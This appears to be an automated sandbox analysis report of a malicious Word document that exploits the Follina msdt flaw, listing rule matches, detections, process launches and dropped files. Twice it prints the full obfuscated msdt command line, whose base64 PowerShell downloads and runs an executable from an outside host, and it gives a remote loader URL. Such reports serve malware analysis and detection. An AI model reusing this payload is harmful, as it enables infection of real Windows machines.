Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: 1C9BD344-9D3E-4B79-B72D-53457722E880.0.dr String found in binary or memory: https://www.odwebp.svc.ms
Source: DiagPackage.dll.6.dr Static PE information: No import functions for PE file found
Source: DiagPackage.dll.mui.6.dr Static PE information: No import functions for PE file found
Source: document.xml.rels, type: SAMPLE Matched rule: EXPL_CVE_2021_40444_Document_Rels_XML date = 2021-09-10, author = Jeremy Brown / @alteredbytes, description = Detects indicators found in weaponized documents that exploit CVE-2021-40444, reference = https://twitter.com/AlteredBytes/status/1435811407249952772
Source: 00000006.00000002.448016935.00000000037D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
Source: Process Memory Space: msdt.exe PID: 5752, type: MEMORYSTR Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
Source: DiagPackage.dll.6.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: DiagPackage.dll.6.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: DiagPackage.dll.6.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE Section loaded: sfc.dll Jump to behavior
Source: nnxPt0Yydv.doc ReversingLabs: Detection: 50%
Source: nnxPt0Yydv.doc Virustotal: Detection: 48%
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll Jump to behavior
Source: unknown Process created: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process created: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process created: C:\Windows\SysWOW64\msdt.exe C:\Windows\system32\msdt.exe" ms-msdt:/ID PCwdIAGnOSTic -skiP fOrce -PAraM "It_rEbrOwsEForFILE=#7qnxE3 IT_LaunchMethod=ContextMenu IT_BrowseForFile=Aq$(iEX($(iEX('[SysTEm.TEXt.eNcOdinG]'+[chAr]58+[cHAr]58+'utF8.getstrING([sysTem.coNverT]'+[CHaR]0X3a+[ChAr]0X3A+'FRomBasE64sTrIng('+[cHAR]34+'c1RvUC1wck9jRXNzIC1mb3JDRSAtbmFNRSAnbXNkdCc7JEsgPSBhRGQtdFlwZSAtTUVtQmVSZGVGaU5JdGlPTiAnW0RsbEltcG9ydCgidVJsbW9OLkRMbCIsIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgZnFtLHN0cmluZyBELHN0cmluZyBFTyx1aW50IHVsLEludFB0ciB0KTsnIC1uYW1FICJ6IiAtbkFtRVNQYWNFIE0gLVBhc3NUaHJ1OyAkSzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cHM6Ly9ldmVudG9yZ2FuaXplci5way9uZXdiaXRoZXJlMjAwNTRyZmRzLmV4ZSIsIiRFTlY6QVBQREFUQVxBbnlOYW1lLmV4ZSIsMCwwKTtzdEFSdC1TbEVFcCgzKTtyVU5EbGwzMi5leEUgemlwZmxkci5kbGwsUm91dGVUaGVDYWxsICIkZU5WOkFQUERBVEFcQW55TmFtZS5leGUiO1NUT3AtUFJvQ2VzUyAtZk9yQ0UgLW5hTUUgJ3NkaWFnbmhvc3Qn'+[chAR]0x22+'))'))))Y/../../../../../../../../../../../.EXE
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2gwbg3vf\2gwbg3vf.cmdline
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6D8D.tmp" "c:\Users\user\AppData\Local\Temp\2gwbg3vf\CSCC73644C54160465D923214F243A883B6.TMP"
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4xgg4xy2\4xgg4xy2.cmdline
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES8088.tmp" "c:\Users\user\AppData\Local\Temp\4xgg4xy2\CSC5443C40DEFB3471C8BBC4E4A57C5FD37.TMP"
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ebglgzvt\ebglgzvt.cmdline
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESFC60.tmp" "c:\Users\user\AppData\Local\Temp\ebglgzvt\CSC3DD4B19D6955475697366FD069454AC2.TMP"
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process created: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process created: C:\Windows\SysWOW64\msdt.exe C:\Windows\system32\msdt.exe" ms-msdt:/ID PCwdIAGnOSTic -skiP fOrce -PAraM "It_rEbrOwsEForFILE=#7qnxE3 IT_LaunchMethod=ContextMenu IT_BrowseForFile=Aq$(iEX($(iEX('[SysTEm.TEXt.eNcOdinG]'+[chAr]58+[cHAr]58+'utF8.getstrING([sysTem.coNverT]'+[CHaR]0X3a+[ChAr]0X3A+'FRomBasE64sTrIng('+[cHAR]34+'c1RvUC1wck9jRXNzIC1mb3JDRSAtbmFNRSAnbXNkdCc7JEsgPSBhRGQtdFlwZSAtTUVtQmVSZGVGaU5JdGlPTiAnW0RsbEltcG9ydCgidVJsbW9OLkRMbCIsIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgZnFtLHN0cmluZyBELHN0cmluZyBFTyx1aW50IHVsLEludFB0ciB0KTsnIC1uYW1FICJ6IiAtbkFtRVNQYWNFIE0gLVBhc3NUaHJ1OyAkSzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cHM6Ly9ldmVudG9yZ2FuaXplci5way9uZXdiaXRoZXJlMjAwNTRyZmRzLmV4ZSIsIiRFTlY6QVBQREFUQVxBbnlOYW1lLmV4ZSIsMCwwKTtzdEFSdC1TbEVFcCgzKTtyVU5EbGwzMi5leEUgemlwZmxkci5kbGwsUm91dGVUaGVDYWxsICIkZU5WOkFQUERBVEFcQW55TmFtZS5leGUiO1NUT3AtUFJvQ2VzUyAtZk9yQ0UgLW5hTUUgJ3NkaWFnbmhvc3Qn'+[chAR]0x22+'))'))))Y/../../../../../../../../../../../.EXE Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6D8D.tmp" "c:\Users\user\AppData\Local\Temp\2gwbg3vf\CSCC73644C54160465D923214F243A883B6.TMP" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES8088.tmp" "c:\Users\user\AppData\Local\Temp\4xgg4xy2\CSC5443C40DEFB3471C8BBC4E4A57C5FD37.TMP" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESFC60.tmp" "c:\Users\user\AppData\Local\Temp\ebglgzvt\CSC3DD4B19D6955475697366FD069454AC2.TMP" Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{88d96a05-f192-11d4-a65f-0040963251e5}\InProcServer32 Jump to behavior
Source: nnxPt0Yydv.doc.LNK.0.dr LNK file: ..\..\..\..\..\Desktop\nnxPt0Yydv.doc
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\{7B1B88AE-6D17-43AC-BDA5-6470D74629C5} - OProcSessId.dat Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE File written: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.ini Jump to behavior
Source: classification engine Classification label: mal80.expl.evad.winDOC@14/32@0/3
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe File opened: C:\Windows\SysWOW64\MSFTEDIT.DLL Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: nnxPt0Yydv.doc Initial sample: OLE zip file path = word/media/image1.jpg
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE File opened: C:\Windows\SysWOW64\MSVCR100.dll Jump to behavior
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2gwbg3vf\2gwbg3vf.cmdline
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4xgg4xy2\4xgg4xy2.cmdline
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ebglgzvt\ebglgzvt.cmdline

Persistence and Installation Behavior

barindex
Source: document.xml.rels Extracted files from sample: mhtml:https://qaz.im/load/diy5ah/b6d42680-56fd-4f98-ae0e-ff81e3799df6!x-usc:https://qaz.im/load/diy5ah/b6d42680-56fd-4f98-ae0e-ff81e3799df6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\4xgg4xy2\4xgg4xy2.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\ebglgzvt\ebglgzvt.dll Jump to dropped file
Source: C:\Windows\SysWOW64\msdt.exe File created: C:\Windows\Temp\SDIAG_aae0d05c-b13b-4632-9efc-c790869732d9\en-US\DiagPackage.dll.mui Jump to dropped file
Source: C:\Windows\SysWOW64\msdt.exe File created: C:\Windows\Temp\SDIAG_aae0d05c-b13b-4632-9efc-c790869732d9\DiagPackage.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\2gwbg3vf\2gwbg3vf.dll Jump to dropped file
Source: C:\Windows\SysWOW64\msdt.exe File created: C:\Windows\Temp\SDIAG_aae0d05c-b13b-4632-9efc-c790869732d9\en-US\DiagPackage.dll.mui Jump to dropped file
Source: C:\Windows\SysWOW64\msdt.exe File created: C:\Windows\Temp\SDIAG_aae0d05c-b13b-4632-9efc-c790869732d9\DiagPackage.dll Jump to dropped file
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE Registry key monitored for changes: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
